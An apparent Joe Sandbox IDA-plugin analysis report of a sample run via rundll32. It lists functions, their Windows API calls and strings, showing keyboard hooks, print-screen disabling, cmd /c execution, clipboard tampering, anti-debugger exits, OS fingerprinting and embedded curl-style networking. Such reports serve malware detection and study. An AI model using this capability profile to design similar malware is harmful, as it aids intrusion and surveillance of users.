closesocket.WS2_32(?), ref: 6D037299

Memory Dump Source

Source File: 00000003.00000002.4692328179.000000006CFF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 6CFF0000, based on PE: true

Associated: 00000003.00000002.4692305101.000000006CFF0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.4692377003.000000006D070000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.4692403575.000000006D089000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.4692424101.000000006D08C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6cff0000_rundll32.jbxd

Similarity

API ID: closesocket
String ID:
API String ID: 2781271927-0
Opcode ID: d537b565484183bbc8d20f7cf844b9537981746cf536033dbc3ee37227d885f9
Instruction ID: 78cbb36f2a32bc4d47101ac75340d1b2b483e5030723fcaba4d561229f2f77c1
Opcode Fuzzy Hash: d537b565484183bbc8d20f7cf844b9537981746cf536033dbc3ee37227d885f9
Instruction Fuzzy Hash: 99F0F632611322ABDB109E95DCC4BEB7BECEFC6616F04042DFA2096160C7719549DBE2

Function 6D062D50 Relevance: 1.5, APIs: 1, Instructions: 39memoryCOMMONLIBRARYCODE

Download Yara Rule

APIs

RtlAllocateHeap.NTDLL(00000008,?,CE3BFFFF,?,6D060E86,00000001,00000364,00000006,000000FF,6D04DDAB,CE3BFFFF,?,6D04EC1A,6D04FC59,FF85FFFF,CE3BFFFF), ref: 6D062D91

Part of subcall function 6D05C2C0: ?SetDisablePrintScreen@@YAXH@Z.HKEYBOARD(?,?,?,6D062D83,?,?,6D060E86,00000001,00000364,00000006,000000FF,6D04DDAB,CE3BFFFF,?,6D04EC1A,6D04FC59), ref: 6D05C2D6

Memory Dump Source

Source File: 00000003.00000002.4692328179.000000006CFF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 6CFF0000, based on PE: true

Associated: 00000003.00000002.4692305101.000000006CFF0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.4692377003.000000006D070000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.4692403575.000000006D089000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.4692424101.000000006D08C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6cff0000_rundll32.jbxd

Similarity

API ID: AllocateDisableHeapPrintScreen@@
String ID:
API String ID: 3987890349-0
Opcode ID: d5a0d90095e060453af0a94d931a98bdde57f86d2ed22aaf396a9d95d10b7dfe
Instruction ID: 17849ecf5b2b1a22fb4713300dc26877748a97e34f3f37f3a474d298c55a9f0a
Opcode Fuzzy Hash: d5a0d90095e060453af0a94d931a98bdde57f86d2ed22aaf396a9d95d10b7dfe
Instruction Fuzzy Hash: 2EF08932E4A6AA67FB325B76CD04B6F37A8AF437B0B118111BC18EB194CB30D40086F1

Function 04EB4E5D Relevance: 1.5, APIs: 1, Instructions: 23COMMONLIBRARYCODE

Download Yara Rule

APIs

__flsbuf.LIBCMT ref: 04EB4E7E

Memory Dump Source

Source File: 00000003.00000002.4691929038.0000000004EB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04EB0000, based on PE: true

Associated: 00000003.00000002.4691929038.0000000004EF2000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.4691929038.0000000004EF6000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.4691929038.0000000004EFA000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_4eb0000_rundll32.jbxd

Similarity

API ID: __flsbuf
String ID:
API String ID: 2056685748-0
Opcode ID: 0ace5904dfc02d4745602e3491f4651976e9a0525a68314e9878bfb92eec9a14
Instruction ID: 25a954d4651688747871a029879930463e2ce9dc95c60bfc398d0d8bac27bb56
Opcode Fuzzy Hash: 0ace5904dfc02d4745602e3491f4651976e9a0525a68314e9878bfb92eec9a14
Instruction Fuzzy Hash: 30E01A300046409EDB264F20D945AB27BB89F4172DF349A8ED6D48D0E3D73AA086DAA0

Function 6D05A669 Relevance: 1.5, APIs: 1, Instructions: 15fileCOMMONLIBRARYCODE

Download Yara Rule

APIs

CreateFileW.KERNEL32(00000000,00000000,?,6D05AA71,?,?,00000000,?,6D05AA71,00000000,0000000C), ref: 6D05A686

Memory Dump Source

Source File: 00000003.00000002.4692328179.000000006CFF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 6CFF0000, based on PE: true

Associated: 00000003.00000002.4692305101.000000006CFF0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.4692377003.000000006D070000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.4692403575.000000006D089000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.4692424101.000000006D08C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6cff0000_rundll32.jbxd

Similarity

API ID: CreateFile
String ID:
API String ID: 823142352-0
Opcode ID: 6e7131211e175cf81b367d97bf3e899df25281ca5603ad53f74f81aea2589f51
Instruction ID: 4c8e91b562b990f94a8a61492fbaf6375bce25ce7dfdf17377516753e325e222
Opcode Fuzzy Hash: 6e7131211e175cf81b367d97bf3e899df25281ca5603ad53f74f81aea2589f51
Instruction Fuzzy Hash: 8CD06C3200010DBBDF028F85DC06EDA3BBAFB4C714F118100FA1866020C732E822AB90

Function 04EC8060 Relevance: 1.5, APIs: 1, Instructions: 15threadCOMMONLIBRARYCODE

Download Yara Rule

APIs

DisableThreadLibraryCalls.KERNEL32(?,?,?,04EB3EBC,?,?,?,?,?,?,04ECC538,0000000C,04EB3F64,?), ref: 04EC806E

Part of subcall function 04EC48A0: OutputDebugStringA.KERNEL32(Blocked,?,?), ref: 04EC48D7
Part of subcall function 04EC48A0: ExitProcess.KERNEL32 ref: 04EC48DF

Memory Dump Source

Source File: 00000003.00000002.4691929038.0000000004EB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04EB0000, based on PE: true

Associated: 00000003.00000002.4691929038.0000000004EF2000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.4691929038.0000000004EF6000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.4691929038.0000000004EFA000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_4eb0000_rundll32.jbxd

Similarity

API ID: CallsDebugDisableExitLibraryOutputProcessStringThread
String ID:
API String ID: 825726465-0
Opcode ID: 3e2b2a1e891103abe1f8fa331121c00d9cba745733aa6da561a50588cfc6108c
Instruction ID: b99b9e602162165346c44cba46700337655f79d887236f687bc77a7a5548ce76
Opcode Fuzzy Hash: 3e2b2a1e891103abe1f8fa331121c00d9cba745733aa6da561a50588cfc6108c
Instruction Fuzzy Hash: D5D0123202162897DB10BF4DE541ECD37ECEB59755F004016F9149B300C6B8BD9287E9

Function 6D03EFA0 Relevance: 1.5, APIs: 1, Instructions: 10COMMON

Download Yara Rule

APIs

ioctlsocket.WS2_32(00000024,8004667E,00000000), ref: 6D03EFBB

Memory Dump Source

Source File: 00000003.00000002.4692328179.000000006CFF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 6CFF0000, based on PE: true

Associated: 00000003.00000002.4692305101.000000006CFF0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.4692377003.000000006D070000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.4692403575.000000006D089000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.4692424101.000000006D08C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6cff0000_rundll32.jbxd

Similarity

API ID: ioctlsocket
String ID:
API String ID: 3577187118-0
Opcode ID: 15d5e3b5b0027c972ccf06152b59d1a318f4205e325e5fba303d377da3548512
Instruction ID: 8df8922d37ffa997da6f172f855709eef859ac68e8a74f22de204af053635997
Opcode Fuzzy Hash: 15d5e3b5b0027c972ccf06152b59d1a318f4205e325e5fba303d377da3548512
Instruction Fuzzy Hash: 2EC00272908216FFCB019F71C94489ABBF9EB85256F11C97EB189E1030EB3199A4DB06

Function 04EB7925 Relevance: 1.5, APIs: 1, Instructions: 10memoryCOMMONLIBRARYCODE

Download Yara Rule

APIs

HeapCreate.KERNEL32(00000000,00001000,00000000,000000FF,?,04EBB0DF,00000011,00000000,?,04EB48E3,0000000D,04ECC5A0,00000008,04EB49DA,00000000), ref: 04EB792E

Memory Dump Source

Source File: 00000003.00000002.4691929038.0000000004EB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04EB0000, based on PE: true

Associated: 00000003.00000002.4691929038.0000000004EF2000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.4691929038.0000000004EF6000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.4691929038.0000000004EFA000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_4eb0000_rundll32.jbxd

Similarity

API ID: CreateHeap
String ID:
API String ID: 10892065-0
Opcode ID: d7325cc01062168cb057db27aa5b50fea2c19dc7e7ba60b77806f293e99aff93
Instruction ID: ccc0d31042e57aecdc77c40b33eb17e680bac136c582405c564641c48a98a40f
Opcode Fuzzy Hash: d7325cc01062168cb057db27aa5b50fea2c19dc7e7ba60b77806f293e99aff93
Instruction Fuzzy Hash: 12C092B07813025BE7584B3AAC5BB8A2598DB48B43F220139B217D95C9DAB498A0AA04

Function 6CFF2750 Relevance: 1.5, APIs: 1, Instructions: 3COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.4692328179.000000006CFF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 6CFF0000, based on PE: true

Associated: 00000003.00000002.4692305101.000000006CFF0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.4692377003.000000006D070000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.4692403575.000000006D089000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.4692424101.000000006D08C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6cff0000_rundll32.jbxd

Similarity

API ID: DebuggerExitPresentProcess
String ID:
API String ID: 1812251604-0
Opcode ID: 79804c6342d124a201a0860bf1b5505f80c45f91b98b1881cc9498dbb9c1e44a
Instruction ID: 665f8bd7d7c2cd6ebc72385b672babedd1500d75a000f8abb1c8cc1b44891f76
Opcode Fuzzy Hash: 79804c6342d124a201a0860bf1b5505f80c45f91b98b1881cc9498dbb9c1e44a
Instruction Fuzzy Hash:

Non-executed Functions

Function 6D01D640 Relevance: 85.4, APIs: 1, Strings: 47, Instructions: 1368COMMON

Download Yara Rule

APIs

_strncpy.LIBCMT ref: 6D01D6A8

Strings

CALG_SCHANNEL_ENC_KEY, xrefs: 6D01DE7B
CALG_HMAC, xrefs: 6D01DFE3
CALG_NO_SIGN, xrefs: 6D01D8DB
CALG_ECDH_EPHEM, xrefs: 6D01E38B
CALG_SSL3_MASTER, xrefs: 6D01DDA3
CALG_DESX, xrefs: 6D01DA43
CALG_RC2, xrefs: 6D01DA8B
CALG_DES, xrefs: 6D01D96B
CALG_3DES_112, xrefs: 6D01D9B3
CALG_SHA_384, xrefs: 6D01E223
CALG_CYLINK_MEK, xrefs: 6D01DD13
CALG_AES_256, xrefs: 6D01E14B
CALG_SKIPJACK, xrefs: 6D01DC83
CALG_PCT1_MASTER, xrefs: 6D01DEC3
CALG_SSL2_MASTER, xrefs: 6D01DF0B
CALG_SHA_256, xrefs: 6D01E1DB
CALG_ECMQV, xrefs: 6D01E2FB
CALG_SSL3_SHAMD5, xrefs: 6D01DD5B
CALG_SCHANNEL_MAC_KEY, xrefs: 6D01DE33
CALG_RC5, xrefs: 6D01DF9B
CALG_RC4, xrefs: 6D01DAD3
CALG_AES_128, xrefs: 6D01E0BB
CALG_SCHANNEL_MASTER_HASH, xrefs: 6D01DDEB
CALG_RSA_SIGN, xrefs: 6D01D849
CALG_SHA, xrefs: 6D01D793
CALG_3DES, xrefs: 6D01D9FB
CALG_HUGHES_MD5, xrefs: 6D01DC3B
CALG_HASH_REPLACE_OWF, xrefs: 6D01E073
CALG_TLS1_MASTER, xrefs: 6D01DF53
CALG_SHA1, xrefs: 6D01D7C9
CALG_SEAL, xrefs: 6D01DB1B
CALG_AES_192, xrefs: 6D01E103
CALG_TEK, xrefs: 6D01DCCB
CALG_MD5, xrefs: 6D01D74B
CALG_SHA_512, xrefs: 6D01E26B
CALG_MAC, xrefs: 6D01D801
CALG_MD2, xrefs: 6D01D6B9
CALG_DH_EPHEM, xrefs: 6D01DBAB
CALG_DSS_SIGN, xrefs: 6D01D893
CALG_AES, xrefs: 6D01E193
CALG_DH_SF, xrefs: 6D01DB63
CALG_ECDH, xrefs: 6D01E2B3
CALG_TLS1PRF, xrefs: 6D01E02B
CALG_RSA_KEYX, xrefs: 6D01D923
CALG_AGREEDKEY_ANY, xrefs: 6D01DBF3
CALG_MD4, xrefs: 6D01D703
CALG_ECDSA, xrefs: 6D01E343

Memory Dump Source

Source File: 00000003.00000002.4692328179.000000006CFF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 6CFF0000, based on PE: true

Associated: 00000003.00000002.4692305101.000000006CFF0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.4692377003.000000006D070000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.4692403575.000000006D089000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.4692424101.000000006D08C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6cff0000_rundll32.jbxd

Similarity

API ID: _strncpy
String ID: CALG_3DES$CALG_3DES_112$CALG_AES$CALG_AES_128$CALG_AES_192$CALG_AES_256$CALG_AGREEDKEY_ANY$CALG_CYLINK_MEK$CALG_DES$CALG_DESX$CALG_DH_EPHEM$CALG_DH_SF$CALG_DSS_SIGN$CALG_ECDH$CALG_ECDH_EPHEM$CALG_ECDSA$CALG_ECMQV$CALG_HASH_REPLACE_OWF$CALG_HMAC$CALG_HUGHES_MD5$CALG_MAC$CALG_MD2$CALG_MD4$CALG_MD5$CALG_NO_SIGN$CALG_PCT1_MASTER$CALG_RC2$CALG_RC4$CALG_RC5$CALG_RSA_KEYX$CALG_RSA_SIGN$CALG_SCHANNEL_ENC_KEY$CALG_SCHANNEL_MAC_KEY$CALG_SCHANNEL_MASTER_HASH$CALG_SEAL$CALG_SHA$CALG_SHA1$CALG_SHA_256$CALG_SHA_384$CALG_SHA_512$CALG_SKIPJACK$CALG_SSL2_MASTER$CALG_SSL3_MASTER$CALG_SSL3_SHAMD5$CALG_TEK$CALG_TLS1PRF$CALG_TLS1_MASTER
API String ID: 2961919466-3550120021
Opcode ID: a828147581fd2fd31ae2c141c9856674f5999ef24dde568a32307e65fc89f0da
Instruction ID: 9330f695dfa2a7910d061bd8fe0ca1ca507e5fb01c7d624fd6a548e42130f08f
Opcode Fuzzy Hash: a828147581fd2fd31ae2c141c9856674f5999ef24dde568a32307e65fc89f0da
Instruction Fuzzy Hash: 4592F75661C1C24AF3455A789CE27BB7FE36FD625CBC848A9C8C6CF252E607C54CC262

Function 6D03FC00 Relevance: 56.1, APIs: 1, Strings: 30, Instructions: 1897COMMON

Download Yara Rule

Strings

Expire Date: %s, xrefs: 6D040BCB
-----END CERTIFICATE-----, xrefs: 6D041206
Version, xrefs: 6D03FD5A
Cert, xrefs: 6D041298
Issuer: %s, xrefs: 6D03FCFA
GMT, xrefs: 6D040000, 6D040510, 6D0409CA, 6D040EED
%.4s-%.2s-%.2s %.2s:%.2s:%c%c%s%.*s%s%.*s, xrefs: 6D040044, 6D040554, 6D040A0E, 6D040F31
TRUE, xrefs: 6D03FDF2, 6D03FDFA, 6D0402D3, 6D0402E0, 6D04078A, 6D040797, 6D040CD9, 6D040CE6
Signature: %s, xrefs: 6D0410E4
Expire Date, xrefs: 6D040BB1
%s%x, xrefs: 6D03FE5A, 6D040347, 6D0407FF, 6D040D47
%2d Subject: %s, xrefs: 6D03FCAA
Issuer, xrefs: 6D03FCE0
0, xrefs: 6D040E72
%lx, xrefs: 6D03FD3B
Start Date, xrefs: 6D0406F5
Subject, xrefs: 6D03FC87
Signature Algorithm: %s, xrefs: 6D040264
%u%.2s-%.2s-%.2s %.2s:%.2s:%.2s %.*s, xrefs: 6D03FF4F, 6D040459, 6D04090C, 6D040E3C
Signature, xrefs: 6D0410C2
-----BEGIN CERTIFICATE-----, xrefs: 6D04116C
Serial Number, xrefs: 6D0401D7
Serial Number: %s, xrefs: 6D0401FE
Start Date: %s, xrefs: 6D04071B
Public Key Algorithm: %s, xrefs: 6D040C3B
Version: %lu (0x%lx), xrefs: 6D03FD97
GMT, xrefs: 6D03FF20, 6D03FF2D, 6D04042A, 6D040437, 6D0408DD, 6D0408EA, 6D040E0D, 6D040E1A
Public Key Algorithm, xrefs: 6D040C1D
FALSE, xrefs: 6D03FDCD, 6D0402D8, 6D04078F, 6D040CDE
Signature Algorithm, xrefs: 6D04024A

Memory Dump Source

Source File: 00000003.00000002.4692328179.000000006CFF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 6CFF0000, based on PE: true

Associated: 00000003.00000002.4692305101.000000006CFF0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.4692377003.000000006D070000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.4692403575.000000006D089000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.4692424101.000000006D08C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6cff0000_rundll32.jbxd

Similarity

API ID:
String ID: Expire Date: %s$ Issuer: %s$ Public Key Algorithm: %s$ Serial Number: %s$ Signature Algorithm: %s$ Signature: %s$ Start Date: %s$ Version: %lu (0x%lx)$ GMT$%.4s-%.2s-%.2s %.2s:%.2s:%c%c%s%.*s%s%.*s$%2d Subject: %s$%lx$%s%x$%u%.2s-%.2s-%.2s %.2s:%.2s:%.2s %.*s$-----BEGIN CERTIFICATE-----$-----END CERTIFICATE-----$0$Cert$Expire Date$FALSE$GMT$Issuer$Public Key Algorithm$Serial Number$Signature$Signature Algorithm$Start Date$Subject$TRUE$Version
API String ID: 0-2545231491
Opcode ID: efc72967e6069bb8767b04357dca384f8badf1a9d3ab7882d6a2c44f24d82036
Instruction ID: debf0bca6ff1cccc0726c2e8bd2b11d4982686813aeba066ecfcc2bac6ccdf77
Opcode Fuzzy Hash: efc72967e6069bb8767b04357dca384f8badf1a9d3ab7882d6a2c44f24d82036
Instruction Fuzzy Hash: A2D29A7190C292DFF7264A358850FBF7BE9AFD6304F04C53DE986AB242D6319905C7A2

Function 6D028100 Relevance: 46.1, APIs: 13, Strings: 13, Instructions: 593networkCOMMON

Download Yara Rule

APIs

_strncpy.LIBCMT ref: 6D02826C
?UnInstallKBHook@@YAHXZ.HKEYBOARD(?,00000000,00000401,?,?,?,?,?,?,?), ref: 6D028337
getsockname.WS2_32(?,?), ref: 6D0283A7
WSAGetLastError.WS2_32(?,00000100), ref: 6D0283BE
WSAGetLastError.WS2_32 ref: 6D0284A1

Strings

Failure sending EPRT command: %s, xrefs: 6D0287F4
bind(port=%hu) on non-local address failed: %s, xrefs: 6D028556
getsockname() failed: %s, xrefs: 6D0283CB, 6D02861C
%s |%d|%s|%hu|, xrefs: 6D0287D4
bind(port=%hu) failed: %s, xrefs: 6D0285CF
PORT, xrefs: 6D028776
%s %s, xrefs: 6D02877B
bind() failed, we ran out of ports, xrefs: 6D028808
Failure sending PORT command: %s, xrefs: 6D02879B
EPRT, xrefs: 6D0287CF
socket failure: %s, xrefs: 6D0284BE
,%d,%d, xrefs: 6D028756
failed to resolve the address provided to PORT: %s, xrefs: 6D02881D

Memory Dump Source

Source File: 00000003.00000002.4692328179.000000006CFF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 6CFF0000, based on PE: true

Associated: 00000003.00000002.4692305101.000000006CFF0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.4692377003.000000006D070000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.4692403575.000000006D089000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.4692424101.000000006D08C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6cff0000_rundll32.jbxd

Similarity

API ID: ErrorLast$Hook@@Install_strncpygetsockname
String ID: %s %s$%s |%d|%s|%hu|$,%d,%d$EPRT$Failure sending EPRT command: %s$Failure sending PORT command: %s$PORT$bind() failed, we ran out of ports$bind(port=%hu) failed: %s$bind(port=%hu) on non-local address failed: %s$failed to resolve the address provided to PORT: %s$getsockname() failed: %s$socket failure: %s
API String ID: 927759634-3876000827
Opcode ID: 8149926bca53bc68ac57e45dfe7197b33b2148ab0b061171f573af7237930691
Instruction ID: 950a0f61998c53bffd1c5cc750009ccb5364adb0999cf82ac7b6dfc50d1c14cb
Opcode Fuzzy Hash: 8149926bca53bc68ac57e45dfe7197b33b2148ab0b061171f573af7237930691
Instruction Fuzzy Hash: 6E12F075909352AFF710DF248C44FBB77E8BB4A308F44492DFA8897242E775D90987A2

Function 04EC6B00 Relevance: 40.5, APIs: 15, Strings: 8, Instructions: 298clipboardsleepmemoryCOMMON

Download Yara Rule

APIs

GetTickCount.KERNEL32 ref: 04EC6B25
_memset.LIBCMT ref: 04EC6CD2
wsprintfA.USER32 ref: 04EC6CE9
ShellExecuteA.SHELL32(00000000,open,cmd,?,00000000,00000000), ref: 04EC6D0A
ShellExecuteA.SHELL32(00000000,open,?,00000000,00000000,00000001), ref: 04EC6D5E
Sleep.KERNEL32(000003E8), ref: 04EC6DB5
OpenClipboard.USER32(00000000), ref: 04EC6E2A
EmptyClipboard.USER32 ref: 04EC6E34
GlobalAlloc.KERNEL32(00002000,00000001), ref: 04EC6E41
GlobalLock.KERNEL32(00000000), ref: 04EC6E4B
GlobalUnlock.KERNEL32(00000000), ref: 04EC6E5E
SetClipboardData.USER32(00000001,00000000), ref: 04EC6E67
CloseClipboard.USER32 ref: 04EC6E6D

Strings

/c %s, xrefs: 04EC6CE3
CopyC, xrefs: 04EC6BA3
{CA170F4C-9C78-46c4-9018-2BAD1F52C16F}, xrefs: 04EC6D2B
Enable, xrefs: 04EC6E00
open, xrefs: 04EC6D03, 04EC6D57
False, xrefs: 04EC6DFB
Remark, xrefs: 04EC6C9A
cmd, xrefs: 04EC6CFE

Memory Dump Source

Source File: 00000003.00000002.4691929038.0000000004EB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04EB0000, based on PE: true

Associated: 00000003.00000002.4691929038.0000000004EF2000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.4691929038.0000000004EF6000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.4691929038.0000000004EFA000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_4eb0000_rundll32.jbxd

Similarity

API ID: Clipboard$Global$ExecuteShell$AllocCloseCountDataEmptyLockOpenSleepTickUnlock_memsetwsprintf
String ID: /c %s$CopyC$Enable$False$Remark$cmd$open${CA170F4C-9C78-46c4-9018-2BAD1F52C16F}
API String ID: 195233984-3851707614
Opcode ID: 5c5d7a99af92d6fc9e45c33202e97ac550bcf2a4e07f3980300e4032b68dbca2
Instruction ID: e247c8d654b37d44932931d199d5335914be0549d72ad4cd2ea3fb4f617d8020
Opcode Fuzzy Hash: 5c5d7a99af92d6fc9e45c33202e97ac550bcf2a4e07f3980300e4032b68dbca2
Instruction Fuzzy Hash: 64911E727042005BD220AB69FC46BDFB794EFC5325F00557EEA8A8B241C9357907C7E2

Function 6D036760 Relevance: 31.9, APIs: 10, Strings: 8, Instructions: 376networkCOMMON

Download Yara Rule

APIs

?UnInstallKBHook@@YAHXZ.HKEYBOARD(?,?,?,?,?,00000100,?,?,?,?,?,?,?,?,?,00000000), ref: 6D0368A0
htons.WS2_32(?), ref: 6D036997
bind.WS2_32(?,?,00000010), ref: 6D036B2E
htons.WS2_32(?), ref: 6D036B6F

Strings

getsockname() failed with errno %d: %s, xrefs: 6D036BE4
Local port: %hu, xrefs: 6D036C35
Couldn't bind to interface '%s', xrefs: 6D0369D1
Local Interface %s is ip %s using address family %i, xrefs: 6D03693E
bind failed with errno %d: %s, xrefs: 6D036C1C
Name '%s' family %i resolved to '%s' family %i, xrefs: 6D036A5C
Couldn't bind to '%s', xrefs: 6D036AD2
Bind to local port %hu failed, trying next, xrefs: 6D036B60

Memory Dump Source

Source File: 00000003.00000002.4692328179.000000006CFF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 6CFF0000, based on PE: true

Associated: 00000003.00000002.4692305101.000000006CFF0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.4692377003.000000006D070000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.4692403575.000000006D089000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.4692424101.000000006D08C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6cff0000_rundll32.jbxd

Similarity

API ID: htons$Hook@@Installbind
String ID: Bind to local port %hu failed, trying next$Couldn't bind to '%s'$Couldn't bind to interface '%s'$Local Interface %s is ip %s using address family %i$Local port: %hu$Name '%s' family %i resolved to '%s' family %i$bind failed with errno %d: %s$getsockname() failed with errno %d: %s
API String ID: 3907360717-586563453
Opcode ID: f6c41612ded864ed8b7167036cb935c596cca3c60a33f6de6d5ae29ef2327864
Instruction ID: ffd15fdb9650a1523ec32383704bad971fb51efbbeea2f618b4b3a40a8b2d888
Opcode Fuzzy Hash: f6c41612ded864ed8b7167036cb935c596cca3c60a33f6de6d5ae29ef2327864
Instruction Fuzzy Hash: 60D1E271608346AFF711DB24C844FBB7BECEF86308F45452DF98897242E76199098BA6

Function 04EC3970 Relevance: 28.1, APIs: 3, Strings: 13, Instructions: 96COMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 04EC3991
GetVersionExA.KERNEL32(?), ref: 04EC39AA
_strncpy.LIBCMT ref: 04EC3ACE

Strings

Unknown, xrefs: 04EC3AC8
Windows 10, xrefs: 04EC3ABC
Windows 2019, xrefs: 04EC3AB0
Windows 2012 R2, xrefs: 04EC3A6B
Windows 2012, xrefs: 04EC3A4B
Windows 7 SP1, xrefs: 04EC3A2B
Windows XP, xrefs: 04EC39E2
Windows 2000, xrefs: 04EC39CA
Windows 8, xrefs: 04EC3A52
Windows 2016, xrefs: 04EC3AA2
Windows 8.1 Update 1, xrefs: 04EC3A72
Windows Vista SP2, xrefs: 04EC3A04
Windows 2008 R2, xrefs: 04EC3A21

Memory Dump Source

Source File: 00000003.00000002.4691929038.0000000004EB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04EB0000, based on PE: true

Associated: 00000003.00000002.4691929038.0000000004EF2000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.4691929038.0000000004EF6000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.4691929038.0000000004EFA000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_4eb0000_rundll32.jbxd

Similarity

API ID: Version_memset_strncpy
String ID: Unknown$Windows 10$Windows 2000$Windows 2008 R2$Windows 2012$Windows 2012 R2$Windows 2016$Windows 2019$Windows 7 SP1$Windows 8$Windows 8.1 Update 1$Windows Vista SP2$Windows XP
API String ID: 1449955169-2950701659
Opcode ID: eed5dff31ca2a4965d692304d94e49b37a672d3a3ba452f2c7cea829020d413c
Instruction ID: 36ac31982963c768f2cbf6a91718572f08dde965ea90880211b8018652953abd
Opcode Fuzzy Hash: eed5dff31ca2a4965d692304d94e49b37a672d3a3ba452f2c7cea829020d413c
Instruction Fuzzy Hash: 39315430B80314ABDF349920AF43FB97264A700B08F54F4DEED99E95C1E9A179A75F42

Function 6D03F520 Relevance: 22.9, APIs: 5, Strings: 8, Instructions: 149encryptionCOMMON

Download Yara Rule

APIs

CryptQueryObject.CRYPT32(00000002,?,00000002,0000000E,00000000,00000000,?,00000000,00000000,00000000,?), ref: 6D03F601
CertAddCertificateContextToStore.CRYPT32(?,?,00000004,00000000), ref: 6D03F622
CertFreeCertificateContext.CRYPT32(00000000), ref: 6D03F62E
GetLastError.KERNEL32(?,00000100), ref: 6D03F648

Strings

schannel: added %d certificate(s) from CA file '%s', xrefs: 6D03F6E8
schannel: did not add any certificates from CA file '%s', xrefs: 6D03F6D4
schannel: failed to extract certificate from CA file '%s': %s, xrefs: 6D03F698
-----BEGIN CERTIFICATE-----, xrefs: 6D03F57C
schannel: failed to add certificate from CA file '%s' to certificate store: %s, xrefs: 6D03F659
schannel: CA file '%s' is not correctly formatted, xrefs: 6D03F6B4
-----END CERTIFICATE-----, xrefs: 6D03F5AA
schannel: unexpected content type '%d' when extracting certificate from CA file '%s', xrefs: 6D03F665

Memory Dump Source

